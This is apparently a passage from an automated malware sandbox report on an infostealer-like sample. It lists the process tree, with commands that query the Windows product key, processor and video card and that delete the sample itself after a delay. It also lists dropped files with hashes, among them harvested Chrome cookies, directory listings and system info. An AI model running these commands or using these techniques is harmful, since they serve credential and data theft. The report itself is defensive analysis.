                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                              3⤵
                                                                                PID:5028
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  4⤵
                                                                                    PID:3980
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1644
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:4084
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:2880
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:3100
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2428
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\90a41e2732bfbf53d5a8ef3efa4d22d5a04b28089886dd104966e491191e79f4.exe""
                                                                                      3⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      PID:4720
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping localhost -n 3
                                                                                        4⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:876

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                  SHA1

                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                  SHA256

                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                  SHA512

                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  944B

                                                                                  MD5

                                                                                  d28a889fd956d5cb3accfbaf1143eb6f

                                                                                  SHA1

                                                                                  157ba54b365341f8ff06707d996b3635da8446f7

                                                                                  SHA256

                                                                                  21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                  SHA512

                                                                                  0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  d0dfbf1536b5b0029a7f90900e78d0e7

                                                                                  SHA1

                                                                                  999bb9c8671e806d16e70038985f905198524128

                                                                                  SHA256

                                                                                  1a79bebe220d0c0f15b58d0669d96d775b4c713d0febca7c6e5b2d4ad8fc48a7

                                                                                  SHA512

                                                                                  d632b82d4bc47a0c3fc7f01a8dff800c289a59f05d954d4e4377448e5ae5cf2fa6f0ecce6e33dec6da39c94838927889bb7a202d41c4e87f78f227310510977e

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  276798eeb29a49dc6e199768bc9c2e71

                                                                                  SHA1

                                                                                  5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                  SHA256

                                                                                  cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                  SHA512

                                                                                  0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  f02abc9024612c398416c2ffc6714cd1

                                                                                  SHA1

                                                                                  1dcc103dc68ba954ecd1a2c9229237ebf6534956

                                                                                  SHA256

                                                                                  05410dbad347c52be976902e0e1806b07c49de40bc49bedf277a534d38d6762c

                                                                                  SHA512

                                                                                  fef6c9a795d2a4e5d927ebc5cffcc01ed3abc199164c084c02a898d8363512709e0fcf460e1178418a5d114ca242ea69ef504794a06f2a1eff8b8ba981e572bc

                                                                                • C:\Users\Admin\AppData\Local\Temp\NeniO.zip

                                                                                  Filesize

                                                                                  435KB

                                                                                  MD5

                                                                                  475a0ce1d8b8e08dbf13801bc05fdbfd

                                                                                  SHA1

                                                                                  3d54afb788bc547c3a63f2d5de54bd14ebde194c

                                                                                  SHA256

                                                                                  d631cfb049680f0b434c0f4bed0c970bc90fc5d3a00db0a69de640642f3ef9aa

                                                                                  SHA512

                                                                                  7bce2eafb9974fd646b5ac8aa1d24c641c152c9b781f84aa7fb26ac7c6a1907df87c263569ba68ca30632699e8d9fd2c8e187dc40cad7a2daa121a64b5b17483

                                                                                • C:\Users\Admin\AppData\Local\Temp\RES9F6C.tmp

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  fe0458d2ce3e35d355aaad13594348a5

                                                                                  SHA1

                                                                                  d97bd971b61806f00dd056724057ef211d57e1bc

                                                                                  SHA256

                                                                                  9a7f4a6c9a52847e119154200446aaa68dbc336271c5ef64ea4ec612bc7db1cd

                                                                                  SHA512

                                                                                  d06ebe7a2302d52b98f4dd17f205f8e8aa5f967980c81a3d9e1bad613d47ea3c0ed510d3fdefe63f6da75313d4be8505359f50001fd86d7cd53d6b1fb0d45951

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\VCRUNTIME140.dll

                                                                                  Filesize

                                                                                  116KB

                                                                                  MD5

                                                                                  be8dbe2dc77ebe7f88f910c61aec691a

                                                                                  SHA1

                                                                                  a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                  SHA256

                                                                                  4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                  SHA512

                                                                                  0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_bz2.pyd

                                                                                  Filesize

                                                                                  48KB

                                                                                  MD5

                                                                                  6c57219d7f69eee439d7609ab9cc09e7

                                                                                  SHA1

                                                                                  52e8abbc41d34aa82388b54b20925ea2fcca2af8

                                                                                  SHA256

                                                                                  8e389c056a6cf8877ddf09a1ae53d1a1b1de71a32b437d992ec8195c3c8eda92

                                                                                  SHA512

                                                                                  801f5b3f15e25f3be3f7ece512ffa561c97d43fff465e8fcb8afc92a94fd0bd3ec57c3e4df775beb1a6357064fad2be2ab6345bb8fe8c9b00674ade546bf6bc3

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_ctypes.pyd

                                                                                  Filesize

                                                                                  58KB

                                                                                  MD5

                                                                                  ee77573f4335614fc1dc05e8753d06d9

                                                                                  SHA1

                                                                                  9c78e7ce0b93af940749295ec6221f85c04d6b76

                                                                                  SHA256

                                                                                  20bc81c1b70f741375751ae7c4a177a409b141bfcd32b4267975c67fc1b11e87

                                                                                  SHA512

                                                                                  c87c9c68cb428c2305076545702e602c8119bb1c4b003fc077fc99a7b0f6ffd12cafdd7ff56dac5d150785adc920d92ea527067c8fec3c4a16737f11d23d4875

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_decimal.pyd

                                                                                  Filesize

                                                                                  106KB

                                                                                  MD5

                                                                                  787f57b9a9a4dbc0660041d5542f73e2

                                                                                  SHA1

                                                                                  219f2cdb825c7857b071d5f4397f2dbf59f65b32

                                                                                  SHA256

                                                                                  d5646447436daca3f6a755e188ea15932ae6b5ba8f70d9c1de78f757d310d300

                                                                                  SHA512

                                                                                  cd06ea22530c25d038f8d9e3cc54d1fdbc421fb7987ab6ebc5b665ae86a73b39a131daef351420f1b1cb522002388c4180c8f92d93ea15460ccba9029cac7eef

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_hashlib.pyd

                                                                                  Filesize

                                                                                  35KB

                                                                                  MD5

                                                                                  ff0042b6074efa09d687af4139b80cff

                                                                                  SHA1

                                                                                  e7483e6fa1aab9014b309028e2d31c9780d17f20

                                                                                  SHA256

                                                                                  e7ddac4d8f099bc5ebcb5f4a9de5def5be1fc62ecca614493e8866dc6c60b2ce

                                                                                  SHA512

                                                                                  0ff0178f7e681a7c138bfd32c1276cf2bd6fbeb734139b666f02a7f7c702a738abdbc9dddcf9ab991dead20ec3bf953a6c5436f8640e73bdd972c585937fa47a

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_lzma.pyd

                                                                                  Filesize

                                                                                  86KB

                                                                                  MD5

                                                                                  58b19076c6dfb4db6aa71b45293f271c

                                                                                  SHA1

                                                                                  c178edc7e787e1b485d87d9c4a3ccfeadeb7039e

                                                                                  SHA256

                                                                                  eff1a7fc55efe2119b1f6d4cf19c1ec51026b23611f8f9144d3ef354b67ff4d5

                                                                                  SHA512

                                                                                  f4305dcc2024a0a138d997e87d29824c088f71322021f926e61e3136a66bea92f80bce06345307935072a3e973255f9bbae18a90c94b80823fbc9a3a11d2b2f4

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_queue.pyd

                                                                                  Filesize

                                                                                  25KB

                                                                                  MD5

                                                                                  e8f45b0a74ee548265566cbae85bfab8

                                                                                  SHA1

                                                                                  24492fcd4751c5d822029759dec1297ff31ae54a

                                                                                  SHA256

                                                                                  29e7801c52b5699d13a1d7b95fd173d4a45ab2791377ac1f3095d5edc8eba4bd

                                                                                  SHA512

                                                                                  5861a0606e2c2c2ebb3d010b4591e4f44e63b9dbfa59f8bb4ac1cda4fbfdcb969864601dee6b23d313fe8706819346cfbcd67373e372c7c23260b7277ee66fbf

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_socket.pyd

                                                                                  Filesize

                                                                                  43KB

                                                                                  MD5

                                                                                  6ef6bcbb28b66b312ab7c30b1b78f3f3

                                                                                  SHA1

                                                                                  ca053c79ce7ea4b0ec60eff9ac3e8dd8ba251539

                                                                                  SHA256

                                                                                  203daa59e7bf083176cbfcc614e3bac09da83d1d09ef4fcd151f32b96499d4b2

                                                                                  SHA512

                                                                                  bec35443715f98ee42fda3697c2009c66d79b1170714ea6dedde51205b64a845194fe3786702e04c593059ee4ad4bbfa776fbc130a3400a4a995172675b3dfa9

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_sqlite3.pyd

                                                                                  Filesize

                                                                                  56KB

                                                                                  MD5

                                                                                  467bcfb26fe70f782ae3d7b1f371e839

                                                                                  SHA1

                                                                                  0f836eb86056b3c98d7baf025b37d0f5fe1a01a5

                                                                                  SHA256

                                                                                  6015c657b94e008e85f930d686634d2cafa884fd8943207ee759bc3a104c0f48

                                                                                  SHA512

                                                                                  19362aa94e6e336fd02f1f60fde9c032a45315f7973a1e597761ae3b49b916aecd89934b8ed33ee85fd53e150a708a4f8f2a25683fb15491daa8430c87a6511c

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\_ssl.pyd

                                                                                  Filesize

                                                                                  65KB

                                                                                  MD5

                                                                                  96af7b0462af52a4d24b3f8bc0db6cd5

                                                                                  SHA1

                                                                                  2545bb454d0a972f1a7c688e2a5cd41ea81d3946

                                                                                  SHA256

                                                                                  23c08f69e5eaa3a4ab9cab287d7dc2a40aca048c8b3c89992cdb62d4de6eb01f

                                                                                  SHA512

                                                                                  2a8ed5a4143b3176e96d220f0255da32a139909dd49625ef839c2dfce46e45f11a0b7340eb60ad1f815a455333e45aece6e0d47a8b474419e3cbbbd46f01c062

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\base_library.zip

                                                                                  Filesize

                                                                                  1.4MB

                                                                                  MD5

                                                                                  6e706e4fa21d90109df6fce1b2595155

                                                                                  SHA1

                                                                                  5328dd26b361d36239facff79baca1bab426de68

                                                                                  SHA256

                                                                                  ce9b9f16ce0d9abdbac3307115d91eaf279c5152336ccbe8830151b41c802998

                                                                                  SHA512

                                                                                  c7e377e2854ad5b5c3fb23593817ad6345bf8a78d842ff2a45c3be135fad6bb27b67c5b6c01b26e7c1b1b12ea0814f4f6b6a522bbfa689b89fa50d3652799b34

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\blank.aes

                                                                                  Filesize

                                                                                  114KB

                                                                                  MD5

                                                                                  2738334a157357096dae360429fe1e0e

                                                                                  SHA1

                                                                                  38ad4577e20a2b6a0d6a5ab2a1130e1c0286c9dd

                                                                                  SHA256

                                                                                  f6c58472e1857d6b9ec7473b0b2dcef2f542bf063d981de037395c2a87d6c58d

                                                                                  SHA512

                                                                                  28c89528c41a58a16d4da1b2ab440b49152848f23ecb4002d78e5302d5c739c4d0a66f36fe6a2c73439c4da50698c8f399657093ac4b65413d4291cae05edfe1

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\libcrypto-3.dll

                                                                                  Filesize

                                                                                  1.6MB

                                                                                  MD5

                                                                                  7f1b899d2015164ab951d04ebb91e9ac

                                                                                  SHA1

                                                                                  1223986c8a1cbb57ef1725175986e15018cc9eab

                                                                                  SHA256

                                                                                  41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

                                                                                  SHA512

                                                                                  ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\libffi-8.dll

                                                                                  Filesize

                                                                                  29KB

                                                                                  MD5

                                                                                  08b000c3d990bc018fcb91a1e175e06e

                                                                                  SHA1

                                                                                  bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                  SHA256

                                                                                  135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                  SHA512

                                                                                  8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\libssl-3.dll

                                                                                  Filesize

                                                                                  222KB

                                                                                  MD5

                                                                                  264be59ff04e5dcd1d020f16aab3c8cb

                                                                                  SHA1

                                                                                  2d7e186c688b34fdb4c85a3fce0beff39b15d50e

                                                                                  SHA256

                                                                                  358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

                                                                                  SHA512

                                                                                  9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\python311.dll

                                                                                  Filesize

                                                                                  1.6MB

                                                                                  MD5

                                                                                  b167b98fc5c89d65cb1fa8df31c5de13

                                                                                  SHA1

                                                                                  3a6597007f572ea09ed233d813462e80e14c5444

                                                                                  SHA256

                                                                                  28eda3ba32f5247c1a7bd2777ead982c24175765c4e2c1c28a0ef708079f2c76

                                                                                  SHA512

                                                                                  40a1f5cd2af7e7c28d4c8e327310ea1982478a9f6d300950c7372634df0d9ad840f3c64fe35cc01db4c798bd153b210c0a8472ae0898bebf8cf9c25dd3638de8

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\rar.exe

                                                                                  Filesize

                                                                                  615KB

                                                                                  MD5

                                                                                  9c223575ae5b9544bc3d69ac6364f75e

                                                                                  SHA1

                                                                                  8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                  SHA256

                                                                                  90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                  SHA512

                                                                                  57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\rarreg.key

                                                                                  Filesize

                                                                                  456B

                                                                                  MD5

                                                                                  4531984cad7dacf24c086830068c4abe

                                                                                  SHA1

                                                                                  fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                  SHA256

                                                                                  58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                  SHA512

                                                                                  00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\select.pyd

                                                                                  Filesize

                                                                                  25KB

                                                                                  MD5

                                                                                  d76b7f6fd31844ed2e10278325725682

                                                                                  SHA1

                                                                                  6284b72273be14d544bb570ddf180c764cde2c06

                                                                                  SHA256

                                                                                  e46d0c71903db7d735cc040975bfc480dfea34b31b3e57b7dafa4c1f4058e969

                                                                                  SHA512

                                                                                  943ca5600f37cf094e08438e1f93b869f108abd556785e5d090051ed8cf003e85c1b380fc95f95bc871db59ffdd61099efa2e32d4354ca0cc70a789cf84abaa1

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\sqlite3.dll

                                                                                  Filesize

                                                                                  630KB

                                                                                  MD5

                                                                                  73b763cedf2b9bdcb0691fb846894197

                                                                                  SHA1

                                                                                  bf2a9e88fba611c2e779ead1c7cfd10d7f4486b2

                                                                                  SHA256

                                                                                  e813695191510bf3f18073491dc0ea1b760bc22c334eefe0e97312810de5d8d5

                                                                                  SHA512

                                                                                  617cb2b6027a3aba009bb9946347c4e282dd50d38ca4764e819631feb3a7fd739fd458e67866f9f54b33b07645ca55229030860a4faab5f677866cfa4a1f7ee2

                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI48682\unicodedata.pyd

                                                                                  Filesize

                                                                                  295KB

                                                                                  MD5

                                                                                  6873de332fbf126ddb53b4a2e33e35a5

                                                                                  SHA1

                                                                                  93748c90cd93fda83fcd5bb8187eeaf6b67a2d08

                                                                                  SHA256

                                                                                  f5631d92e9da39a6a1e50899d716eac323829d423a7f7fa21bd5061232564370

                                                                                  SHA512

                                                                                  0e03ba8c050aeadf88c390e5ea5e8e278f873885c970b67d5bc0675d782233a2925e753dae151c7af9976f64c42eba04a4dcec86204e983f6f6f2788a928401c

                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ksdut34.pe2.ps1

                                                                                  Filesize

                                                                                  60B

                                                                                  MD5

                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                  SHA1

                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                  SHA256

                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                  SHA512

                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                • C:\Users\Admin\AppData\Local\Temp\ovbtupv2\ovbtupv2.dll

                                                                                  Filesize

                                                                                  4KB

                                                                                  MD5

                                                                                  4a2dfa6bca5d7f56e9b229f63dacc7cc

                                                                                  SHA1

                                                                                  e0a1d50c824b08216ebb35a71b4259894438ddbe

                                                                                  SHA256

                                                                                  162932e458ce1c68fd97d9645d3af85171c14a9cfb538ec86ac61d220ce269a8

                                                                                  SHA512

                                                                                  8d668ee971795eedcd9780c93b3c399f340082eedcf8bdd5ca35294e190913ef88bf7d229e1a5564debcf3a5dde52ca6fd28531e96386a946734826c39435747

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Credentials\Chrome\Chrome Cookies.txt

                                                                                  Filesize

                                                                                  258B

                                                                                  MD5

                                                                                  0bff0b1b7fb01feacc0337484dd703de

                                                                                  SHA1

                                                                                  d3599688e94f0ac519dad69709e89e802548a92a

                                                                                  SHA256

                                                                                  58382978b282974e5b8575a8a5bcd0ccbe1afa737f13eee3857deaba9dc9c2e9

                                                                                  SHA512

                                                                                  939ecb8139fb0bb3c8de88130826e00ec842ae7d02f95d11f0f5c716af1a270a8beeb112af2a5b11fff7f254a37a1e4124e949880e39a1b18ac09ac5a06daea9

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Desktop.txt

                                                                                  Filesize

                                                                                  749B

                                                                                  MD5

                                                                                  e760a19f367eb610a543343431af01ee

                                                                                  SHA1

                                                                                  a3d171303354ffbbdc582825a8acde7c4cb003ac

                                                                                  SHA256

                                                                                  071c32dbead07e4509ad21710bc95f2dc95309c0bce09b7efeef2eb8e39cf701

                                                                                  SHA512

                                                                                  b0f1a1c3a7f71f8a30cc972fb6e78166e723454b6db6ff4fd3ec0b891983f0b3a79ad218a98202da42248e2fb87d3dac608a48bcdb50e71fe3c73e77950f7b07

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Documents.txt

                                                                                  Filesize

                                                                                  815B

                                                                                  MD5

                                                                                  0e153a238aa771f320eb7a59cc4d5557

                                                                                  SHA1

                                                                                  78853c44a3ac46408310c4c917b512cbedd7ea18

                                                                                  SHA256

                                                                                  2c9471c76b38e27d5e56f43efff3a5a44fcf06685eaa608899dac2a9538a7327

                                                                                  SHA512

                                                                                  61565bd3106ee3efdc17d0f381e4dfe1df6bbb9f7a7ea36e823281377660b6d03d64a2810221d6312111a36247afd75a655810125c6ee50e31dead62a70c8f7d

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Downloads.txt

                                                                                  Filesize

                                                                                  818B

                                                                                  MD5

                                                                                  955193812cc6bbf3d09c4d424d18ebeb

                                                                                  SHA1

                                                                                  f80f55a8103b7dc5178eff326e86e32e229187f0

                                                                                  SHA256

                                                                                  63605b78b5b541fcbde6489d16788eb6a41723fc55add63f5d9b891781c9b299

                                                                                  SHA512

                                                                                  7d24a3734ea0c1b5685ebc66612fa4eda4c4bcfe3eff274575f7b65ff6b4b31b3e13daf2a99698a445e60222030cd06579550bd3c4169e0e8a90c7c2baf66945

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Music.txt

                                                                                  Filesize

                                                                                  616B

                                                                                  MD5

                                                                                  a6148d9ae756bf2e348e107801ed4793

                                                                                  SHA1

                                                                                  fe0eacccb6c5b91c8e2b952a868612de4cc00639

                                                                                  SHA256

                                                                                  1634d852279141d4cb022b2369fd4042e7c75136f29765f09c211a1cf33bffeb

                                                                                  SHA512

                                                                                  446a570b23578121b33038f661bd8d1868fdeb1013ad25f4d1825ee45316e9c712f38e8dfa49555a3ec702f95837ff2d3ca760f55a4cddd69d37ca5c2d8e0b52

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Pictures.txt

                                                                                  Filesize

                                                                                  686B

                                                                                  MD5

                                                                                  bf025ef3b43d4dc1d08842a04fb1e3ce

                                                                                  SHA1

                                                                                  4d207e59b954961cd1a6a51af2a68a800f8a2168

                                                                                  SHA256

                                                                                  e12d4ebb14ae1eaf3ad88bdd522cc81f53446a868334ba94607f42220259ea10

                                                                                  SHA512

                                                                                  f796c94f366f0e897a15fe179781c79e653446ad211aafe57b3ed128504bcf2c446319483635600ee7c503f6676922c0fefba5ba414f6b0740924aa62c95712c

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Directories\Videos.txt

                                                                                  Filesize

                                                                                  30B

                                                                                  MD5

                                                                                  e140e10b2b43ba6f978bee0aa90afaf7

                                                                                  SHA1

                                                                                  bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                                                                  SHA256

                                                                                  c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                                                                  SHA512

                                                                                  df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \Display (1).png

                                                                                  Filesize

                                                                                  431KB

                                                                                  MD5

                                                                                  90635fae1da5b9eed139bd786e83aa85

                                                                                  SHA1

                                                                                  a016ede3381bdf15828af7ed590f4f40bc5a2d23

                                                                                  SHA256

                                                                                  e941edd21ed1987144cf5b5e48c7356c06ec18126d5710d9ce0d136ac5402a9a

                                                                                  SHA512

                                                                                  5e77373aef71f9173a8b28423f0b7f2e3cd24a13b4e488cbff9de4a03bf24aac87fd48c57bd800ccaeafedf433353635a4dcfc0514a92cfe4e170e059250fb48

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \System\MAC Addresses.txt

                                                                                  Filesize

                                                                                  232B

                                                                                  MD5

                                                                                  8ae9eb6ad538219ab631113905c83449

                                                                                  SHA1

                                                                                  c60fd9f2c0c76a76424f00141bd735b105667b65

                                                                                  SHA256

                                                                                  6c3651f381dcdee7131fea967b5f7ce2ddd8cbe68133b90a1a982342438ef5ce

                                                                                  SHA512

                                                                                  b85af930f41c8d6561c951c43791a53acdeba44ba56311a9c857b2ac01558d74fa0eff9184e5ea1f33b4c049ca18b5f5b2e5d9af94ba7607de1cabf5ab575cc3

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \System\System Info.txt

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  de386a1a0419f7133bacc01c76b904b9

                                                                                  SHA1

                                                                                  8cc327e87fbf7aa493c7b4782119a569d63a400d

                                                                                  SHA256

                                                                                  e2f79fcbd64c9dc039d6b57cfea6a1ab81f795368a75583bf6d28982fdcd6cb8

                                                                                  SHA512

                                                                                  eee059bf81c261764d0011901f39c8bfd60c2f0548409258723d52011a5fd40e15bda7b53263150524474a583ed654a29860c55aa53aab53941af0bc393453d2

                                                                                • C:\Users\Admin\AppData\Local\Temp\ ‌   ​ ‌  \System\Task List.txt

                                                                                  Filesize

                                                                                  12KB

                                                                                  MD5

                                                                                  c5418bab7d90346ccf9260ad1717ae2f

                                                                                  SHA1

                                                                                  51188455800e63eed50b894e9c54dea21fe44db2

                                                                                  SHA256

                                                                                  40b1df988b54351119245e095856bdd26ce47a87a2bcc56eca85238edf81d598

                                                                                  SHA512

                                                                                  e8ab5ff9c73eebf08ef40c55121c71be09998db29f778060a10102275fdb07d1a9ed11366ee1e4adf458de071d024d2befeaacee9d78c54f8df544b332f1977f

                                                                                • C:\Windows\System32\drivers\etc\hosts

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                  SHA1

                                                                                  e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                  SHA256

                                                                                  a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                  SHA512

                                                                                  c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\ovbtupv2\CSC6FE5A9D9E4DB4E648A4913E660AF4ED0.TMP

                                                                                  Filesize

                                                                                  652B

                                                                                  MD5

                                                                                  343ae80bed47768f81bd2b5197c41256

                                                                                  SHA1

                                                                                  66f4c9ecaab4a3c8d49de23b0fe7f976dd22ef92

                                                                                  SHA256

                                                                                  5545ed948ce32137769f68861988e814ccf09bf5af96f0cda057466dfb65fe67

                                                                                  SHA512

                                                                                  4c162c8dbe9a7bd069fe25feb49906a70f5829eb59554d6620b6c9c5cf9d5fd30a3b55aa11b805e83d25ee954d7a1edd2618d8f00fb78c19a6abda7b4e6d2035

                                                                                • \??\c:\Users\Admin\AppData\Local\Temp\ovbtupv2\ovbtupv2.0.cs

                                                                                  Filesize

                                                                                  1004B

                                                                                  MD5

                                                                                  c76055a0388b713a1eabe16130684dc3

                                                                                  SHA1

                                                                                  ee11e84cf41d8a43340f7102e17660072906c402

                                                                                  SHA256

                                                                                  8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                  SHA512

